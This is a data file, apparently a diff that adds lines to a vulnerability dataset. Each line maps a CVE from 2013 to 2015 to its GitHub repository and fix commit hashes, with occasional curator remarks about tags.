+CVE-2013-1607;https://github.com/pdfkit/pdfkit;None:None;False;ce37ffcdb223b34dd215971e2cd365e3a66cb5f1; +CVE-2013-1654;https://github.com/puppetlabs/puppet;None:None;False;be920acdb4762f6d813a29065ba210aef3ef612a,add9998c2f7c49c1eabf846566c0272a5f931f45,52be043933d40aab3449214f2aa602ceb214f91e; +CVE-2013-1800;https://github.com/jnunemaker/crack;None:None;False;e3da1212a1f84a898ee3601336d1dbbf118fb5f6; +CVE-2013-1801;https://github.com/jnunemaker/httparty;None:None;False;53a812426dd32108d6cba4272b493aa03bc8c031; +CVE-2013-1812;https://github.com/openid/ruby-openid;None:None;False;a3693cef06049563f5b4e4824f4d3211288508ed,be2bab5c21f04735045e071411b349afb790078f,3540a51e6f2f7fc7033f906fbd0a6c5153155e5a; +CVE-2013-1879;https://github.com/apache/activemq;None:None;False;148ca81dcd8f14cfe2ff37012fd1aa42518f02dc; +CVE-2013-1880;https://github.com/apache/activemq;None:None;False;fafd12dfd4f71336f8e32c090d40ed1445959b40; +CVE-2013-2013;https://github.com/openstack/python-keystoneclient;None:None;False;f2e0818bc97bfbeba83f6abbb07909a8debcad77; +CVE-2013-2035;https://github.com/fusesource/hawtjni;None:None;False;92c266170ce98edc200c656bd034a237098b8aa5; +CVE-2013-2115;https://github.com/apache/struts;None:None;False;fed4f8e8a4ec69b5e7612b92d8ce3e476680474b,d7804297e319c7a12245e1b536e565fcea6d6503; +CVE-2013-2132;https://github.com/mongodb/mongo-python-driver;None:None;False;a060c15ef87e0f0e72974c7c0e57fe811bbd06a2,842e675299318e02d8d223c458df87c029f66efc,7395ce72bf54ef64d723e1b4140556ebd12a2a07,d9b088e6d8a8b5f71acff10b6a13ba2b22fca718; +CVE-2013-2134;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; +CVE-2013-2135;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; +CVE-2013-2172;https://github.com/apache/santuario-java;None:None;False;a6795ec8148c1f91d8633694599ce34a5c06050d; +CVE-2013-2191;https://github.com/python-bugzilla/python-bugzilla;None:None;False;a782282ee479ba4cc1b8b1d89700ac630ba83eef; +CVE-2013-2254;https://github.com/apache/sling-org-apache-sling-servlets-post;None:None;False;57091b9bb7699fdc8dfb900b0e9b01bb0a848e4b,7ddd5df1282a47a99af1f7f4897fc7abe1ec056b; +CVE-2013-2275;https://github.com/puppetlabs/puppet;None:None;False;b9023b0c919312df648e424f392aa88c9b081599,a52013709b708ed346ea612f85e2b97d96fa66e2,e01e61e8909ec3ad4c873905a4dd9b952e3f4009,632e12d24d460b6dfd5cd3b65b2ad6397f2a2193; +CVE-2013-3300;https://github.com/lift/framework;None:None;False;099d9c86cf6d81f4953957add478ab699946e601; +CVE-2013-3567;https://github.com/puppetlabs/puppet;None:None;False;ce50d4ab992efdd1edd138d2a0eb6987213dcad1; +CVE-2013-4002;https://github.com/apache/xerces2-j;None:None;False;266e837852e0f0e3c8c1ad572b6fc4dbb4ded17b; +CVE-2013-4111;https://github.com/openstack/python-glanceclient;None:None;False;822cd64c0718b46a065abbb8709f6b466d12e708; +CVE-2013-4116;https://github.com/npm/npm;None:None;False;f4d31693e73a963574a88000580db1a716fe66f1; +CVE-2013-4152;https://github.com/spring-projects/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173,2c030d4dcf4866bccc7a59d47398d6bc0de52ce2,3515acfa3db84bb62ef8ef8794a214c0d55fd47e; +CVE-2013-4204;https://github.com/gwtproject/gwt;None:None;False;4b1e5710d184205116e0e144b4501feb998e40b6; vulnerable tag is fixed +CVE-2013-4249;https://github.com/django/django;None:None;False;cbe6d5568f4f5053ed7228ca3c3d0cce77cf9560,90363e388c61874add3f3557ee654a996ec75d78,bfbae15c669beab335400ab51a060e3d7d8e4c7a; +CVE-2013-4251;https://github.com/scipy/scipy;None:None;False;bd296e0336420b840fcd2faabb97084fd252a973,27f8ed3839a74c2c9a92455ae5ab139d63201133,a05353d4511a1d86254d6b0a577d87c6715114e2; +CVE-2013-4286;https://github.com/apache/tomcat80;None:None;False;f0a7dc325201131ed31211c503c3a23714d8244f,bcce3e4997a4ed06fe03e2517443f3ad8ade2dfa,41b90b6ebc3e7f898a5a87d197ddf63790d33315; the two last commits were from tomcat standard repo, not tomcat80. Also not included in RC3 and RC2 is already fixed. +CVE-2013-4316;https://github.com/apache/struts;None:None;False;58947c3f85ae641c1a476316a2888e53605948d1; +CVE-2013-4322;https://github.com/apache/tomcat80;None:None;False;d85d0d1764259b62db0374f01df4bf6dddb12712,c806b2fc6b04ca4e928b3467d94f30f20c820d9d; vulnerable tag is fixed +CVE-2013-4353;https://github.com/openssl/openssl;None:None;False;197e0ea817ad64820789d86711d55ff50d71f631,8d65fdb62e517281350372775b5f93fcc8489681,2f972419a324761783e251dbdc735065bff88ac8; +CVE-2013-4413;https://github.com/zombocom/wicked;None:None;False;fe31bb2533fffc9d098c69ebeb7afc3b80509f53; +CVE-2013-4428;https://github.com/openstack/glance;None:None;False;a50bfbf490fd354d08abd25b67aaab83b2a17a85,feb735412021b771d4fe8b5706506abe6677899b,02e97689e60b643d446720659c9688702aea197b; if using 2013.2 shound find it. The 2013.1.4 tag is nowhere in the commits +CVE-2013-4477;https://github.com/openstack/keystone;None:None;False;c6800ca1ac984c879e75826df6694d6199444ea0,4221b6020e6b0b42325d8904d7b8a22577a6acc0,82dcde08f60c45002955875664a3cf82d1d211bc; +CVE-2013-4562;https://github.com/simi/omniauth-facebook;None:None;False;ccfcc26fe7e34acbd75ad4a095fd01ce5ff48ee7; +CVE-2013-4701;https://github.com/openid/php-openid;None:None;False;625c16bb28bb120d262b3f19f89c2c06cb9b0da9; +CVE-2013-4761;https://github.com/puppetlabs/puppet;None:None;False;a177c9d333b052c4d81d09ae2538bd5393612c69,13a3048994b19e22c13ac32da8eb15af5cfea954; commits have no tags +CVE-2013-5093;https://github.com/graphite-project/graphite-web;None:None;False;c198e5836970f0970b96498fcbe6fa83d90110cf,4a9f98647be279a39a982bd94922fdec710b0b3f; +CVE-2013-5123;https://github.com/pypa/pip;None:None;False;c2b799df9cd9bd9fcc124f6729d56b3180c813e8,3ef4ee4693db5e255dcfef1acf73427f6c97646b,dc559473e2667de130cd3ed4d57c4e125ee10d93; +CVE-2013-6044;https://github.com/django/django;None:None;False;1a274ccd6bc1afbdac80344c9b6e5810c1162b5f,ec67af0bd609c412b76eaa4cc89968a2a8e5ad6a,ae3535169af804352517b7fea94a42a1c9c4b762,79594b40c087c19fecc72af042c835b11a519b78; +CVE-2013-6235;https://github.com/stevensouza/jamonapi;None:None;False;05e6be6849abade047056c25ece23d9553deb3f3; +CVE-2013-6348;https://github.com/apache/struts;None:None;False;fd27e5cc748420a53d51e0e19a10efe8c582c2c0,01584fabc74635d63a1b2670f18d8fcd1ee046cc; +CVE-2013-6429;https://github.com/spring-projects/spring-framework;None:None;False;2ae6a6a3415eebc57babcb9d3e5505887eda6d8a,7387cb990e35b0f1b573faf29d4f9ae183d7a5ef; +CVE-2013-6430;https://github.com/spring-projects/spring-framework;None:None;False;f5c9fe69a444607af667911bd4c5074b5b073e7b,7a7df6637478607bef0277bf52a4e0a03e20a248; +CVE-2013-6465;https://github.com/kiegroup/jbpm-wb;None:None;False;4818204506e8e94645b52adb9426bedfa9ffdd04; +CVE-2013-7315;https://github.com/frankneusource/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173; +CVE-2013-7370;https://github.com/senchalabs/connect;None:None;False;277e5aad6a95d00f55571a9a0e11f2fa190d8135,126187c4e12162e231b87350740045e5bb06e93a; +CVE-2013-7378;https://github.com/github/hubot-scripts;None:None;False;feee5abdb038a229a98969ae443cdb8a61747782; +CVE-2013-7397;https://github.com/AsyncHttpClient/async-http-client;None:None;False;df6ed70e86c8fc340ed75563e016c8baa94d7e72,dfacb8e05d0822c7b2024c452554bd8e1d6221d8; +CVE-2013-7398;https://github.com/AsyncHttpClient/async-http-client;None:None;False;a894583921c11c3b01f160ada36a8bb9d5158e96,bbdc1b3cc6ffc0eda0dd0ad54557db557ae937f7,fa056c572ab0c9b6edd05a7cc508898f35cc90d5,db6716ad2f10f5c2d5124904725017b2ba8c3434,3c9152e2c75f7e8b654beec40383748a14c6b51b; +CVE-2013-7459;https://github.com/pycrypto/pycrypto;None:None;False;8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4; +CVE-2014-0012;https://github.com/pallets/jinja;None:None;False;acb672b6a179567632e032f547582f30fa2f4aa7,964c61ce79f6748ff8c583e2eb12ec54082bf188; +CVE-2014-0014;https://github.com/emberjs/ember.js;None:None;False;d9977d62b26534555c0708acde0e7ae029e6d8ea,e52e047305849756c78abc1e760d621531c2c0a7,12fa46ba1c6efb9ddac7bfdef7f4f6909781c801,c80748313f93757b28f2bd3bd3d594e1e8e03d80,cc6cd6c1115e9f3f3ff2efa22dcb84080f7d4856,18f7d8a4159a707290ec9d09722aa4c39dfeb10a; +CVE-2014-0035;https://github.com/apache/cxf;None:None;False;5df3f72f1a26b7c9ac2888ab65e41f4105706580,2d2fd1bf67dc2247b6aca31b83a571d865fad1c9,d249721708694cbb0f431c0658166ebdcb02ec15; +CVE-2014-0050;https://github.com/apache/commons-fileupload;None:None;False;c61ff05b3241cb14d989b67209e57aa71540417a; +CVE-2014-0072;https://github.com/apache/cordova-plugin-file-transfer;None:None;False;a1d6fc07e8a40c1b2b16f4103c403b30e1089668; +CVE-2014-0073;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;26702cb0720c5c394b407c23570136c53171fa55; +CVE-2014-0075;https://github.com/apache/tomcat80;None:None;False;d49a03728ac7e3c800b1b0ce0eeccd8a5a21bb91,f646a5acd5e32d6f5a2d9bf1d94ca66b65477675,b6974571c122f6a1e7ec74a90fa212976fa7b0ed; +CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; +CVE-2014-0097;https://github.com/spring-projects/spring-security;None:None;False;88559882e967085c47a7e1dcbc4dc32c2c796868,a7005bd74241ac8e2e7b38ae31bc4b0f641ef973,7dbb8e777ece8675f3333a1ef1cb4d6b9be80395; +CVE-2014-0107;https://github.com/apache/xalan-j;None:None;False;52c27d504ced40719d243a8715d7f67d531723da,cbfd906cc5a1f1566fa1a98400c82e56077fae0c; +CVE-2014-0109;https://github.com/apache/cxf;None:None;False;f8ed98e684c1a67a77ae8726db05a04a4978a445,6dd839afbb4d834ed668738bd89e7775c1cf2f9d; +CVE-2014-0110;https://github.com/apache/cxf;None:None;False;8f4799b5bc5ed0fe62d6e018c45d960e3652373e,643b1bc7320ca90c3e078e50509f9a30a0ab45be,35cd29270b77b489cb23552637d66d47ce480f4c; +CVE-2014-0116;https://github.com/apache/struts;None:None;False;1a668af7f1ffccea4a3b46d8d8c1fe1c7331ff02; vulnerable tag is fixed +CVE-2014-0120;https://github.com/hawtio/hawtio;None:None;False;b4e23e002639c274a2f687ada980118512f06113; +CVE-2014-0121;https://github.com/hawtio/hawtio;None:None;False;5289715e4f2657562fdddcbad830a30969b96e1e; +CVE-2014-0160;https://github.com/openssl/openssl;None:None;False;96db9023b881d7cd9f379b0c154650d6c108e9a3; +CVE-2014-0177;https://github.com/github/hub;None:None;False;016ec99d25b1cb83cb4367e541177aa431beb600; +CVE-2014-0193;https://github.com/netty/netty;None:None;False;48edb7802b42b0e2eb5a55d8eca390e0c9066783,787a85f9f1b816ee901c1ec00348ae2007bb9d3b,8599ab5bdb761bb99d41a975d689f74c12e4892b,73b26b7c2598f36196b760ec590eefd37c8db62a,dfbd8e881980677bc21b5a53b80c8555061ffa84,cab1fa22ff43f604cc11631d5fccfa3e9231399a,93fab1d5a3a45a8104e560118930c1d652dce8cb; +CVE-2014-0224;https://github.com/openssl/openssl;None:None;False;bc8923b1ec9c467755cd86f7848c50ee8812e441,410a49a4fa1d2a1a9775ee29f9e40cbbda79c149,006cd7083f76ed5cb0d9a914857e9231ef1bc317; +CVE-2014-0225;https://github.com/spring-projects/spring-framework;None:None;False;44ee51a6c9c3734b3fcf9a20817117e86047d753,c6503ebbf7c9e21ff022c58706dbac5417b2b5eb,8e096aeef55287dc829484996c9330cf755891a1; +CVE-2014-0228;https://github.com/apache/hive;None:None;False;c3d7083b7605d1753946c4c4411e3a3241ea7ffe; 0.13.1 did not include the commit +CVE-2014-1202;https://github.com/SmartBear/soapui;None:None;False;6373165649ad74257493c69dbc0569caa7e6b4a6; +CVE-2014-1402;https://github.com/pallets/jinja;None:None;False;964c61ce79f6748ff8c583e2eb12ec54082bf188,acb672b6a179567632e032f547582f30fa2f4aa7; +CVE-2014-1403;https://github.com/oyvindkinsey/easyXDM;None:None;False;a3194d32c25a0d27a10a47304eb9c9be93ffbf13; +CVE-2014-1604;https://github.com/alex/rply;None:None;False;fc9bbcd25b0b4f09bbd6339f710ad24c129d5d7c; +CVE-2014-1829;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87; +CVE-2014-1830;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87,4d8cb3244e8e4f84b250c10a48e025f9a8bf6137; +CVE-2014-1832;https://github.com/phusion/passenger;None:None;False;94428057c602da3d6d34ef75c78091066ecac5c0,34b1087870c2bf85ebfd72c30b78577e10ab9744; +CVE-2014-1858;https://github.com/numpy/numpy;None:None;False;c7a30d538ba4c984d6f97b613486a3738b2c7922,961c43da78bf97ce63183b27c338db7ea77bed85,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; +CVE-2014-1859;https://github.com/numpy/numpy;None:None;False;961c43da78bf97ce63183b27c338db7ea77bed85,c7a30d538ba4c984d6f97b613486a3738b2c7922,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; +CVE-2014-1869;https://github.com/zeroclipboard/zeroclipboard;None:None;False;2f9eb9750a433965572d047e24b0fc78fd1415ca,eebdfa425ca2525f3b363cdc9e50bcfbcc35a2e6; +CVE-2014-1904;https://github.com/spring-projects/spring-framework;None:None;False;741b4b229ae032bd17175b46f98673ce0bd2d485; +CVE-2014-1932;https://github.com/python-pillow/Pillow;None:None;False;4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,1e331e3e6a40141ca8eee4f5da9f74e895423b66,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; +CVE-2014-1933;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; +CVE-2014-2053;https://github.com/JamesHeinrich/getID3;None:None;False;afbdaa044a9a0a9dff2f800bd670e231b3ec99b2,dc8549079a24bb0619b6124ef2df767704f8d0bc; +CVE-2014-2235;https://github.com/ASKBOT/askbot-devel;None:None;False;a676a86b6b7a5737d4da4f59f71e037406f88d29,876e3662ff6b78cc6241338c15e3a0cb49edf4e2; +CVE-2014-2525;https://github.com/yaml/libyaml;None:None;False;d1003a9d40b674520934f4f38ffc4ff2a809bc2d; +CVE-2014-2538;https://github.com/chopmo/rack-ssl;None:None;False;d99a9b403eb0cc7acbfa380daa501186e370583f,9d7d7300b907e496db68d89d07fbc2e0df0b487b,94041c3e68bdca772715a353295dd53e42cf5ed0,7445c16f989d2e434235c2df4f6d99ebff10897d; wrong repo old (changed probably) +CVE-2014-3007;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7; is pillow 2.3:2.4 +CVE-2014-3120;https://github.com/elastic/elasticsearch;None:None;False;95bd04b2c7fd7387c7e3b3367361dcf9fe9f9d06; +CVE-2014-3250;https://github.com/puppetlabs/puppet;None:None;False;b02af7e05d9b9a3bc23474933d8d7f6cd6191158; +CVE-2014-3488;https://github.com/netty/netty;None:None;False;2fa9400a59d0563a66908aba55c41e7285a04994; +CVE-2014-3505;https://github.com/openssl/openssl;None:None;False;bff1ce4e6a1c57c3d0a5f9e4f85ba6385fccfe8b,1b7024fb69161619855d86b80ae0681ea802e245,84361b898d456220039bc8b292f7b0ba70224a26,2172d4f63c61922487008f42511cc6bdae9b47a0,49850075555893c9c60d5b981deb697f3b9515ea; +CVE-2014-3506;https://github.com/openssl/openssl;None:None;False;1250f12613b61758675848f6600ebd914ccd7636,338a5e7e5458edf4cf754fd831a451fb4b57d180,934ca0714a686673695c055de86064f423984477,fc7804ec392fcf8051abe6bc9da9108744d2ae35,0598468fc04fb0cf2438c4ee635b587aac1bcce6; +CVE-2014-3509;https://github.com/openssl/openssl;None:None;False;fb0bc2b273bcc2d5401dd883fe869af4fc74bb21,03a12c1330575398cbdbd301b923af65bb7f4466,86788e1ee6908a5b3a4c95fa80caa4b724a8a434,92aa73bcbfad44f9dd7997ae51537ac5d7dc201e; +CVE-2014-3511;https://github.com/openssl/openssl;None:None;False;280b1f1ad12131defcd986676a8fc9717aaa601b,fc4bd2f287582c5f51f9549727fd5a49e9fc3012,67e53f73bf44ba354bac0fab1b38c6c596b49fc6,fc4f4cdb8bf9981904e652abf69b892a45bddacf,40a2200d89b2a559700cee95f1898312f993792a; +CVE-2014-3572;https://github.com/openssl/openssl;None:None;False;b15f8769644b00ef7283521593360b7b2135cb63,e42a2abadc90664e2615dc63ba7f79cf163f780a,ef28c6d6767a6a30df5add36171894c96628fe98,802a070bb6452dd9df49e550e0f3b16777e5232b,4aaf1e493cb86efa64f6a486a27d38da6bce23af; +CVE-2014-3576;https://github.com/apache/activemq;None:None;False;00921f22ff9a8792d7663ef8fadd4823402a6324; +CVE-2014-3577;https://github.com/apache/httpcomponents-client;None:None;False;51cc67567765d67f878f0dcef61b5ded454d3122; +CVE-2014-3578;https://github.com/spring-projects/spring-framework;None:None;False;8ee465103850a3dca018273fe5952e40d5c45a66,748167bfa33c3c69db2d8dbdc3a0e9da692da3a0,f6fddeb6eb7da625fd711ab371ff16512f431e8d; +CVE-2014-3579;https://github.com/apache/activemq-apollo;None:None;False;e5647554e6801a522c508a8eb457979a9af8c398; +CVE-2014-3599;https://github.com/hornetq/hornetq;None:None;False;b3a63576371828d5f8e64ba7ccbcecb1da8111d2; +CVE-2014-3600;https://github.com/apache/activemq;None:None;False;b9696ac80bb496b52d05c3884f81b0746d9af9e2,3e5ac6326db59f524a0e71f6b717428607d7b67d; +CVE-2014-3612;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; +CVE-2014-3625;https://github.com/spring-projects/spring-framework;None:None;False;3f68cd633f03370d33c2603a6496e81273782601,9cef8e3001ddd61c734281a7556efd84b6cc2755,9beae9ae4226c45cd428035dae81214439324676; +CVE-2014-3630;https://github.com/playframework/playframework;None:None;False;656ee5a56bd7b2c7821d8dcb437688ae1deab1b7,97f9ddbb13d8f373e8088f4bb41cb2ccd6df9de7,b226583403179d815e8ae7e76c381b22a9a7c2e0; +CVE-2014-3709;https://github.com/keycloak/keycloak;None:None;False;bb132e1aa0b3b3a123883d0b8d0b788337df956d; +CVE-2014-3741;https://github.com/tojocky/node-printer;None:None;False;e001e38738c17219a1d9dd8c31f7d82b9c0013c7; +CVE-2014-3994;https://github.com/djblets/djblets;None:None;False;77a68c03cd619a0996f3f37337b8c39ca6643d6e,d3e428a6f7bc4c04d100b06e663c071fdc1717d9; +CVE-2014-3995;https://github.com/djblets/djblets;None:None;False;77ac64642ad530bf69e390c51fc6fdcb8914c8e7; +CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814; +CVE-2014-4657;https://github.com/ansible/ansible;None:None;False;998793fd0ab55705d57527a38cee5e83f535974c; +CVE-2014-4658;https://github.com/ansible/ansible;None:None;False;a0e027fe362fbc209dbeff2f72d6e95f39885c69,75e0b7a5cf805217a9365b995c5b99ed12aea5af; +CVE-2014-4678;https://github.com/ansible/ansible;None:None;False;5429b85b9f6c2e640074176f36ff05fd5e4d1916,b8b96b210915789745ece8ad04f1c1bfc1c72030; +CVE-2014-5277;https://github.com/docker/docker-py;None:None;False;537b4681403cd9dd29b753584e6c8317edf7ae3f; +CVE-2014-6394;https://github.com/pillarjs/send;None:None;False;9c6ca9b2c0b880afd3ff91ce0d211213c5fa5f9a; +CVE-2014-7143;https://github.com/twisted/twisted;None:None;False;3b5942252f5f3e45862a0e12b266ab29e243cc33; 15.0.0 did not include the commit +CVE-2014-7189;https://github.com/golang/go;None:None;False;247820ff6bfba6e1b7891f4bfc25511d68761d5d; +CVE-2014-7192;https://github.com/browserify/syntax-error;None:None;False;9aa4e66eb90ec595d2dba55e6f9c2dd9a668b309; +CVE-2014-7193;https://github.com/hapijs/crumb;None:None;False;5e6d4f5c81677fe9e362837ffd4a02394303db3c; +CVE-2014-7202;https://github.com/zeromq/libzmq;None:None;False;fe4396c597929382214c7966e60f025114d4f32d,77f14aad95cdf0d2a244ae9b4a025e5ba0adf01a; +CVE-2014-7203;https://github.com/zeromq/libzmq;None:None;False;e40d4b23762502c2de9bc2bc4817dfe2f33b8ed9,0900a489213d74feb86fc0b343308fe7884a2a3c; +CVE-2014-7205;https://github.com/outmoded/bassmaster;None:None;False;bece966a3106ee6a5506efc2f9bc32c379f54aa1,b751602d8cb7194ee62a61e085069679525138c4; +CVE-2014-7809;https://github.com/apache/struts;None:None;False;1f301038a751bf16e525607c3db513db835b2999; +CVE-2014-8115;https://github.com/kiegroup/kie-wb-distributions;None:None;False;90eed433d36b21265fdf978252b8619766b8e74b; +CVE-2014-8152;https://github.com/apache/santuario-xml-security-java;None:None;False;3d7086c603a4538933dfa98d697d0df4539a984f; +CVE-2014-8176;https://github.com/openssl/openssl;None:None;False;d52eb82781eff1f8245ae9c16c84db765f037cbe,470990fee0182566d439ef7e82d1abf18b7085d7,bcc311668ede6ffdcd6dc5a65454a548b5404fcc,b79e6e3a276634582012d531f4150a5fcf84fab3,4b258e73ae0da0f1a7ff3eb9840b6978711c2400; +CVE-2014-8547;https://github.com/FFmpeg/FFmpeg;None:None;False;8f1457864be8fb9653643519dea1c6492f1dde57,9ae3cd6e7271a3d6b8cd92a4d35ebb16d2e03f1a,02de44073a8e116ea177b53081219d32ef135ad8,0b39ac6f54505a538c21fe49a626de94c518c903,7f90eef87ac84c617b102b689eb68e7cb140167b; +CVE-2014-8548;https://github.com/FFmpeg/FFmpeg;None:None;False;c727401aa9d62335e89d118a5b4e202edf39d905,a331e11906b196c9a00f5ffbc45d80fcd7fe8423,306ee95088243fefa2dfcb5c355d439db75e2d2a,f249e9889155599ee3ad0172832d38f68b0c625d,d423dd72be451462c6fb1cbbe313bed0194001ab,c0c24bc9b32419c7883a344c74a6779374a3c16a; +CVE-2014-8549;https://github.com/FFmpeg/FFmpeg;None:None;False;550f3e9df3410b3dd975e590042c0d83e20a8da3,cee4490b521fd0d02476d46aa2598af24fb8d686,84d26ab6eb07e22ad6ffcd8109ca1d1a0cd57bce; +CVE-2014-8650;https://github.com/requests/requests-kerberos;None:None;False;208bebb7008796a07be0204d9b5beaa55d2373ae,9c1e08cc17bb6950455a85d33d391ecd2bce6eb6; +CVE-2014-8681;https://github.com/gogs/gogs;None:None;False;83283bca4cb4e0f4ec48a28af680f0d88db3d2c8; +CVE-2014-8682;https://github.com/gogs/gogs;None:None;False;0c5ba4573aecc9eaed669e9431a70a5d9f184b8d; +CVE-2014-8991;https://github.com/pypa/pip;None:None;False;043fe9f5700315d97f83609c1f59deece8f1b901,01610be0d58bc428646126090cb2905cf219b2f4; +CVE-2014-9130;https://github.com/yaml/libyaml;None:None;False;e6aa721cc0e5a48f408c52355559fd36780ba32a; +CVE-2014-9489;https://github.com/gollum/grit_adapter;None:None;False;4520d973c81fecfebbeacd2ef2f1849d763951c7; +CVE-2014-9682;https://github.com/skoranga/node-dns-sync;None:None;False;d9abaae384b198db1095735ad9c1c73d7b890a0d; +CVE-2014-9720;https://github.com/tornadoweb/tornado;None:None;False;c2a8c322b3f3f54f6525d7469ecab1af46862bc2,1c36307463b1e8affae100bf9386948e6c1b2308,7279a303d1c366aabd4facfc6b29ed46c3422350; +CVE-2014-9721;https://github.com/zeromq/zeromq4-x;None:None;False;b6e3e0f601e2c1ec1f3aac880ed6a3fe63043e51; +CVE-2014-9970;https://github.com/jboss-fuse/jasypt;None:None;False;8e62852a8018978ee19d39056c650fb66ffa0ff6; +CVE-2014-10068;https://github.com/hapijs/inert;None:None;False;48a7fab2f36016893a05bf29b8ac70d21feb495e,f1c70be886c968e9786ab7feae721132fabed448,e8f99f94da4cb08e8032eda984761c3f111e3e82,08931fcef7e67b3f6aac7b207eafa31d3754f1ef; +CVE-2014-10077;https://github.com/ruby-i18n/i18n;None:None;False;9c8b24031abe12d9024e69eccda76ea8061976ba,24e71a9a4901ed18c9cab5c53109fd9bf2416bcb; +CVE-2015-0204;https://github.com/openssl/openssl;None:None;False;ce325c60c74b0fa784f5872404b722e120e5cab0,37580f43b5a39f5f4e920d17273fab9713d3a744,08a88774bd8463bedf7fe440a165d3d98b702361,72f181539118828ca966a0f8d03f6428e2bcf0d6,4b4c1fcc88aec8c9e001b0a0077d3cd4de1ed0e6; +CVE-2015-0205;https://github.com/openssl/openssl;None:None;False;1421e0c584ae9120ca1b88098f13d6d2e90b83a3,a4aa18879917d9bd45f52ac110c69303a852b7db,f7fe3d235abf201343c20a59f9d9c8957acc62ff,be3fb8d15dd5a233eab0c454677d538e64d17f82,98a0f9660d374f58f79ee0efcc8c1672a805e8e8; +CVE-2015-0206;https://github.com/openssl/openssl;None:None;False;b095884a58876ccd3e65f620b7f80d61b4bce687,7c6a3cf2375f5881ef3f3a58ac0fbd0b4663abd1,103b171d8fc282ef435f8de9afbf7782e312961f,04685bc949e90a877656cf5020b6d4f90a9636a6; +CVE-2015-0208;https://github.com/openssl/openssl;None:None;False;4b22cce3812052fe64fc3f6d58d8cc884e3cb834,09f06923e636019c39c807cb59c481375e720556; +CVE-2015-0209;https://github.com/openssl/openssl;None:None;False;5e5d53d341fd9a9b9cc0a58eb3690832ca7a511f,9e442d485008046933cdc7da65080f436a4af089,c380bff888bfd5e48c4b24250ba1996b0fd1a5e3,dfc3e9698b755e179e8ae8e3cef7ff4e07cfd500,dac693c957dc40dbf839f0add91b824deba26dc3,a4517be9e348634ac64f9cf093131e13e8c03e38,89117535f1bb3ea72a17933b703271587d7aaf0b,ba5d0113e8bcb26857ae58a11b219aeb7bc2408a,1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a,18029a3d0739284cadb309ea0fd498379b0bcfdb; +CVE-2015-0250;https://github.com/apache/xmlgraphics-batik;None:None;False;efebce3f0ad33ede916a148b84d75749aea38349; +CVE-2015-0276;https://github.com/zhumengyuan/kallithea;None:None;False;68183cc8e48e4e4fee8510ee819f903b3af3a01b; +CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins +CVE-2015-0287;https://github.com/openssl/openssl;None:None;False;8106d61c354430d6bbbd7f8e7840a39efc0f5829,b717b083073b6cacc0a5e2397b661678aff7ae7f,7746ff501c65968203f376e46bd1eeb93efb0f64,674341f1b0548e36a6cc49917334f5cbd09aaa2c,b485d976340d3ca080060c3c7dee9102e2200762; +CVE-2015-0288;https://github.com/openssl/openssl;None:None;False;28a00bcd8e318da18031b2ac8778c64147cd54f9,241cff623e2b0f7c435a3a80ae783c29d994f061,4bf7b291692c59270ddca0e62de1f11611591cfc,51527f1e3564f210e984fe5b654c45d34e4f03d7,9fdbaf3a322689a58381c724e4f3497320a69581; +CVE-2015-0289;https://github.com/openssl/openssl;None:None;False;c0334c2c92dd1bc3ad8138ba6e74006c3631b0f9,544e3e3b69d080ee87721bd03c37b4d450384fb9,c225c3cf9bd67297fb0c297768d69cbc03fbdab7; +CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e; +CVE-2015-0292;https://github.com/openssl/openssl;None:None;False;fce3821111e3307a599d2378f2cca2ef2097c6c4,d0666f289ac013094bbbf547bfbcd616199b7d2d,9febee02720902c195fe929ecfe06362c551422c,84fe686173d519dfee5d264272beab666508fc57; 